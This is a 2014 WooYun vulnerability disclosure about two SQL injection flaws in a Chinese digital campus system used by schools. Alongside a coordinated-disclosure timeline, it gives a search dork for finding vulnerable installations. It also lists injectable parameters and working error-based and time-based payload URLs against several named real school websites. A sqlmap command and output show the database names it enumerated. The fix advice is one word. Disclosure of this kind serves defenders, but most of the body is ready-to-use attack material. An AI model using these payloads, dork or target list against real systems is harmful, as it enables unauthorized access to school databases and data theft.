漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-076538
漏洞标题:某通用型数字化校园系统SQL注入漏洞(两处)
相关厂商:新座标数字校园系统
漏洞作者: 路人甲
提交时间:2014-09-19 17:10
修复时间:2014-12-18 17:12
公开时间:2014-12-18 17:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-24: 厂商已经确认,细节仅向厂商公开
2014-09-27: 细节向第三方安全合作伙伴开放
2014-11-18: 细节向核心白帽子及相关领域专家公开
2014-11-28: 细节向普通白帽子公开
2014-12-08: 细节向实习白帽子公开
2014-12-18: 细节向公众公开
简要描述:
某通用型数字化校园系统SQL注入漏洞(两处)
ps:)专业查漏捡漏
详细说明:
新座标数字校园系统注入漏洞
官网:http://www.wxlibiao.com/home/?uid=10549
新座标数字校园系统很多学校在使用。。
百度搜索:inurl:/dpma/FWeb/
近4000收录量
经测试发现存在两处SQL注入漏洞:
====== 第一处 ======
漏洞链接:/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=1055
注入参数:VideoID
====== 第二处 ======
漏洞链接:/DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002&sid=305001
注入参数:KindSetID
漏洞证明:
第一处注入:
1)报错注入
http://www.azxx.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=1055%20and%201=@@version--
2)sqlmap注入
$ py sqlmap.py -u 'http://www.azxx.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=1055' --dbms mssql --level 5 --risk 3 --dbs -v 0 -p VideoID
---
Place: GET
Parameter: VideoID
Type: boolean-based blind
Title: Generic boolean-based blind - Parameter replace (original value)
Payload: KindSetID=30000&VideoID=(SELECT (CASE WHEN (2890=2890) THEN 1055 ELSE 1/(SELECT 0) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: KindSetID=30000&VideoID=1055 AND 9144=CONVERT(INT,(SELECT CHAR(113)+CHAR(104)+CHAR(117)+CHAR(103)+CHAR(113)+(SELECT (CASE WHE
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: KindSetID=30000&VideoID=-3007 OR 8226=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sy
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[18:21:48] [INFO] resumed: azxxweb
[18:21:48] [INFO] resumed: dpma
[18:21:48] [INFO] resumed: dpma_cloud
[18:21:48] [INFO] resumed: dpma_school
[18:21:48] [INFO] resumed: DPMA_V11_??
[18:21:48] [INFO] resumed: dss
[18:21:48] [INFO] resumed: master
[18:21:48] [INFO] resumed: model
[18:21:48] [INFO] resumed: msdb
[18:21:48] [INFO] resumed: openfire_chat
[18:21:48] [INFO] resumed: tempdb
available databases [11]:
[*] azxxweb
[*] dpma
[*] dpma_cloud
[*] dpma_school
[*] DPMA_V11_??
[*] dss
[*] master
[*] model
[*] msdb
[*] openfire_chat
[*] tempdb
其他案例:
http://www.azxx.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=1055;waitfor%20delay%20'0:0:5'--
http://www.ohedu.cn//DPMA/FWeb/SPEWeb/Webr5/SPEVideosDetail.aspx?KindSetID=20010&ALBUMID=2011%20and%201=@@version--
http://www.fstc.pdedu.sh.cn//DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=20010&ALBUMID=2011%20and%201=@@version--
http://web.ncjy.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=20010&ALBUMID=2011%20and%201=@@version--
http://szxy.ncjy.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=20010&ALBUMID=2011%20and%201=@@version--
第二处注入:
http://www.azxx.net/DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002'&sid=305001
其他案例:
http://www.ohedu.cn//DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002'&sid=305001
http://www.fstc.pdedu.sh.cn//DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002'&sid=305001
http://web.ncjy.net//DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002'&sid=305001
http://szxy.ncjy.net//DPMA/FWeb/SPEWeb/Web5/SPEVideosList.aspx?KindSetID=30002'&sid=305001
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-09-24 08:27
厂商回复:
最新状态:
暂无